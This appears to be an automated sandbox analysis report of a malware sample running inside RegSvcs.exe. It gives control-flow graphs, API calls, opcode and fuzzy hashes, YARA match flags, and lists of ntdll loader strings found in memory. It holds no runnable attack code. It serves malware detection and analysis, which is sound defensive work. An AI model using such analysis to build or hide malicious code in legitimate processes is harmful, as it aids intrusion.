                                                                  • Instruction Fuzzy Hash: B3E046362042547BC220BA5AEC41FDB776DEBC5754F00441AFA08A7241D6B6BA158BE8

                                                                  Control-flow Graph

                                                                  control_flow_graph 410 16d2b60-16d2b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                  • Instruction ID: 7717d4a7af475cfb367eba90537a68cc4a00c137075e44ac92c6ad4b089dc974
                                                                  • Opcode Fuzzy Hash: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                  • Instruction Fuzzy Hash: 49900261203400034105755C4818617404E97E0201B55C121E5014A90EC52589916225
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                                  • Instruction ID: 6ed4820aada1423bbf4f4f60d513ca7212ab44ff512a5394069aea06052cb639
                                                                  • Opcode Fuzzy Hash: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                                  • Instruction Fuzzy Hash: 0D90023120240413D111755C4908707004D97D0241F95C512A4424A58ED6568A52A221
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                                  • Instruction ID: 288f8675e09a690ddc82b374e771f448b7ced65557117f7ad838067794e8dc42
                                                                  • Opcode Fuzzy Hash: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                                  • Instruction Fuzzy Hash: 0290023120248802D110755C880874B004997D0301F59C511A8424B58EC69589917221
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                                  • Instruction ID: c0b37a149e9c0b9247451601b2fb4c6281ec8de63b7ad062405388ed698ba3bb
                                                                  • Opcode Fuzzy Hash: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                                  • Instruction Fuzzy Hash: 9590023160650402D100755C4918707104997D0201F65C511A4424A68EC7958A5166A2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                                  • Instruction ID: 3c683207899974e191189142c536af44746b7e051b83f101aac545a713f4ebdb
                                                                  • Opcode Fuzzy Hash: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                                  • Instruction Fuzzy Hash: D7018C71A0524C7FE7129EA0AC82CEFFBACDE82754B0481DEF61097251C6355E428791

                                                                  Control-flow Graph

                                                                  control_flow_graph 10 414086-4140d0 call 42e933 call 42f343 call 417853 18 4140d7-4140fd call 424f43 10->18 19 4140d2 call 4045c3 10->19 22 41411d-414123 18->22 23 4140ff-41410e PostThreadMessageW 18->23 19->18 23->22 24 414110-41411a 23->24 24->22
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                                  • Instruction ID: 7b3e0f07fc7c6ddc1f756203e9316b04f6aa799e2925db75b152c8468b4ea2e0
                                                                  • Opcode Fuzzy Hash: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                                  • Instruction Fuzzy Hash: 9F114CB1E0011C7EDB01EBE19C82DEFBB7CDF81798F40806AFA04A7141D6785E068BA1

                                                                  Control-flow Graph

                                                                  control_flow_graph 25 414093-4140d0 call 42e933 call 42f343 call 417853 33 4140d7-4140fd call 424f43 25->33 34 4140d2 call 4045c3 25->34 37 41411d-414123 33->37 38 4140ff-41410e PostThreadMessageW 33->38 34->33 38->37 39 414110-41411a 38->39 39->37
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                                  • Instruction ID: 01bac9bffc664040b2840fdb37e185e6924918b58f593d4067fc296cad9bf454
                                                                  • Opcode Fuzzy Hash: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                                  • Instruction Fuzzy Hash: 5B01D6B1D0011C7AEB11ABE19C82DEFBB7CDF81798F40806AFA14B7141D6785E464BB5

                                                                  Control-flow Graph

                                                                  control_flow_graph 40 414124 call 42e933 call 42f343 call 417853 48 4140d7-4140fd call 424f43 40->48 49 4140d2 call 4045c3 40->49 52 41411d-414123 48->52 53 4140ff-41410e PostThreadMessageW 48->53 49->48 53->52 54 414110-41411a 53->54 54->52
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                                  • Instruction ID: a53e75af234e0e2e8dc2ff362a0ab489f932a6b22d02496a9ffdf3fd85ddbe1d
                                                                  • Opcode Fuzzy Hash: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                                  • Instruction Fuzzy Hash: 1101F2B2D0011C7ADB11AAE19C82DEFBB7CDF81798F41806AFA04B7101D63C4E464BA5

                                                                  Control-flow Graph

                                                                  control_flow_graph 386 42cae3-42cb27 call 404653 call 42da03 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E634,?,?,00000000,?,0041E634,?,?,?), ref: 0042CB22
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction ID: 02f8b4c6de11923e5652d0b1f4fbb4dcd003679feaa33a1029ac6aba649ea141
                                                                  • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction Fuzzy Hash: BDE09271604254BBC610EE99DC42FDB73ADEFC9714F004419FE08A7281D771B92187B8

                                                                  Control-flow Graph

                                                                  control_flow_graph 391 42cb33-42cb74 call 404653 call 42da03 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,004170BD,000000F4), ref: 0042CB6F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction ID: 88be9b9c6e7c59d6deab935c3c2594d1acbce9d117d58b86ffaeade349e087e0
                                                                  • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction Fuzzy Hash: 58E06D712043047BE610EE99EC41FDB33ADEFC5710F004419FA18A7282DA75B9108AB8

                                                                  Control-flow Graph

                                                                  control_flow_graph 401 42cb83-42cbbc call 404653 call 42da03 ExitProcess
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,20989162,?,?,20989162), ref: 0042CBB7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                                  • Instruction ID: 4425423616075f17903b9c30fbfbf6d552649cbcaebd69dcc1db9d7e0672c02a
                                                                  • Opcode Fuzzy Hash: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                                  • Instruction Fuzzy Hash: 9CE086356042157BD210FA5ADC01FAF775CDFC5755F00842AFA08A7282D775790087F4

                                                                  Control-flow Graph

                                                                  control_flow_graph 406 16d2c0a-16d2c0f 407 16d2c1f-16d2c26 LdrInitializeThunk 406->407 408 16d2c11-16d2c18 406->408
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                                  • Instruction ID: ba76f9ab6ac0d39e23c2995f7bb9df5ffb78c63a8cf16095b39b44ae380ab899
                                                                  • Opcode Fuzzy Hash: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                                  • Instruction Fuzzy Hash: 99B09B71D025C5C5DA52E7644E0C717794477D0701F15C165D2030751F4738C5D1E275
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                                  • Instruction ID: aa9889d8c47b22913551357996b02baba02d8abd9f37ec9efc71c4392e746fcb
                                                                  • Opcode Fuzzy Hash: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                                  • Instruction Fuzzy Hash: 2F929B71608342AFE721DE28CC80B6BF7E9BB84710F24492DFA95D7256D770E844CB96
                                                                  Strings
                                                                  • Invalid debug info address of this critical section, xrefs: 017054B6
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01705543
                                                                  • undeleted critical section in freed memory, xrefs: 0170542B
                                                                  • 8, xrefs: 017052E3
                                                                  • Address of the debug info found in the active list., xrefs: 017054AE, 017054FA
                                                                  • Thread identifier, xrefs: 0170553A
                                                                  • corrupted critical section, xrefs: 017054C2
                                                                  • Critical section debug info address, xrefs: 0170541F, 0170552E
                                                                  • Critical section address., xrefs: 01705502
                                                                  • double initialized or corrupted critical section, xrefs: 01705508
                                                                  • Critical section address, xrefs: 01705425, 017054BC, 01705534
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054E2
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054CE
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0170540A, 01705496, 01705519
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                                  • Instruction ID: 007e2caeb1fb2ac7ae096a38f4a2b632a55811a96d51ece2d99ee9bc9a9c36f3
                                                                  • Opcode Fuzzy Hash: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                                  • Instruction Fuzzy Hash: 70815AB1A41358EEEB21CF99CC45BAEFBF9EB09B14F204159F505B7280D3B5A941CB60
                                                                  Strings
                                                                  • @, xrefs: 0170259B
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01702624
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017022E4
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017025EB
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01702498
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01702602
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01702412
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01702506
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01702409
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0170261F
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017024C0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  • API String ID: 0-4009184096
                                                                  • Opcode ID: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                                  • Instruction ID: 8674e35bab41e631af36498c8ee708baf9dc0525304411c6c34e7639bc96057c
                                                                  • Opcode Fuzzy Hash: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                                  • Instruction Fuzzy Hash: FD0262B2D002299BDB71DB54CC94BE9F7B8AB54704F0141EEEA09A7242DB709E84CF59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                                  • Instruction ID: bd25d48b0f0e20ea763259efc8c3d0219ea275232a53d57d15f78ca3c162e7fd
                                                                  • Opcode Fuzzy Hash: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                                  • Instruction Fuzzy Hash: B951AE715143019BD325CF288C48BABBBECEFD8654F144A6DB99983242E770D644CB93
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 0-1700792311
                                                                  • Opcode ID: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                                  • Instruction ID: c94804ea10fc84dbda0dc1b9f1451bb8b918d104a48dce887f55891e86f6fc0d
                                                                  • Opcode Fuzzy Hash: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                                  • Instruction Fuzzy Hash: ECD1CE31600686DFDB22EF68C841AEDFBF2FF4A720F188149F6469B252C7749941CB55
                                                                  Strings
                                                                  • VerifierDebug, xrefs: 01718CA5
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01718B8F
                                                                  • VerifierDlls, xrefs: 01718CBD
                                                                  • VerifierFlags, xrefs: 01718C50
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01718A3D
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01718A67
                                                                  • HandleTraces, xrefs: 01718C8F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                                  • Instruction ID: bfaf7ebd862d12c32827ec55c8e551b5e0c59ee2fe0c9186e1071b2f48f80727
                                                                  • Opcode Fuzzy Hash: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                                  • Instruction Fuzzy Hash: 269135B2685312AFD721EF6CCC80B6AFBA5FB94B24F14455CFA416B248C7309D01CB96
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                                  • Instruction ID: bc85aa46e0e3e93060ec262a30cf2ffc0582f7010298ea843f16e9a5eeb32669
                                                                  • Opcode Fuzzy Hash: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                                  • Instruction Fuzzy Hash: F591F370B41315DBEB26DF18DC94BAEFBE1EB50B24F24812CEA066B385D7609842C795
                                                                  Strings
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016E9A2A
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016E99ED
                                                                  • apphelp.dll, xrefs: 01686496
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016E9A11, 016E9A3A
                                                                  • LdrpInitShimEngine, xrefs: 016E99F4, 016E9A07, 016E9A30
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016E9A01
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-204845295
                                                                  • Opcode ID: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                                  • Instruction ID: 5e8fd23b264cac80f9e4b57ff15bb55df8a5dc493e0fddd517432a5a19bd9c81
                                                                  • Opcode Fuzzy Hash: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                                  • Instruction Fuzzy Hash: BE51B0712483019BD720EF28DC85AAB77E5EF84B58F104A1DE98697250DB30E945CB92
                                                                  Strings
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01702160, 0170219A, 017021BA
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0170219F
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01702180
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017021BF
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01702178
                                                                  • SXS: %s() passed the empty activation context, xrefs: 01702165
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                                  • Instruction ID: 132e573ce2f3aba20076f68583a62880f5407a9444cf6b61561e93cac84e0fc5
                                                                  • Opcode Fuzzy Hash: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                                  • Instruction Fuzzy Hash: 69313976B40325B7F7229B998C99F7BBBB9EB64E40F05006DFE05A7241D3709E01C6A1
                                                                  Strings
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01708181, 017081F5
                                                                  • LdrpInitializeProcess, xrefs: 016CC6C4
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 017081E5
                                                                  • LdrpInitializeImportRedirection, xrefs: 01708177, 017081EB
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016CC6C3
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01708170
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
